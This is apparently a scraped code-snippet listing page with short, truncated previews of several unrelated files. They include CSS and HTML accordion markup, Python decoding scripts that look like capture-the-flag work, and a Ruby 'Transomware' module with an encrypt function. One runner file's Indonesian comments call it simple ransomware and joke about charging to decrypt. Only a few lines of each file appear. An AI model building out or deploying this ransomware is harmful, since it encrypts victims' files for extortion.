This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* Frisidea Custom */ | |
.accordion-wrapper{ | |
margin-top: 10px; | |
} | |
.accordion-wrapper .card{ | |
margin-bottom: 10px; | |
} | |
.accordion-wrapper a{ | |
color: black; |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<div class="accordion-wrapper"> | |
<div class="card"> | |
<div class="card-header"> | |
<a data-toggle="collapse" href="#tes"> | |
<div class="row"> | |
<div class="col-md-1"> | |
<div class="row"> | |
<div class="col-md-12"> | |
<span class="text-center">JAN</span> | |
</div> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, zlib, gzip | |
def depress(str): | |
list_str = list(str) | |
list_str[0] = chr(ord(str[0]) ^ ord('E')) | |
str = ''.join(list_str) | |
z = str[0] | |
for x, y in enumerate(str[1:]): | |
z += chr(ord(y) ^ ord(z[x])) | |
return z |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import sys, re | |
def main(): | |
filename = sys.argv[1] | |
chipers_gksk = open(filename, "r").read() | |
split_gksk = filename.split(".") | |
the_real_flag = "" | |
chiper = chipers_gksk | |
while True: | |
if "gksk" not in split_gksk: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "securerandom" | |
require "time" | |
module Transomware | |
@time = Time.parse("2016-11-26 11:35:58 +0800").to_i * 0xff | |
def Transomware.random | |
r = Random.new(@time) | |
r.seed | |
return r.rand(31337) | |
end |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require "securerandom" | |
module Transomware | |
@time = Time.now.to_i * 0xff | |
def Transomware.random | |
r = Random.new(@time) | |
r.seed | |
return r.rand(31337) | |
end | |
def Transomware.encrypt(file) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
$LOAD_PATH << '.' | |
require 'transomware' | |
# Source tanpa obfuscate | |
# Cuma simple ransomware | |
# Tapi jangan mencobanya pada sembarang directory | |
# Jika data anda terencrypt karena menjalankan program ini maka itu adalah 10000000% kesalahan anda, jangan meminta saya membalikan data anda | |
# Kecuali bayarannya pas :D | |
def banner |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python2 | |
import socket | |
import threading | |
import time | |
import SocketServer | |
import random | |
HOST = "192.168.0.254" | |
PORT = 4001 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import string | |
import mechanize | |
import socket | |
import Queue | |
import threading | |
import time | |
import sys |
NewerOlder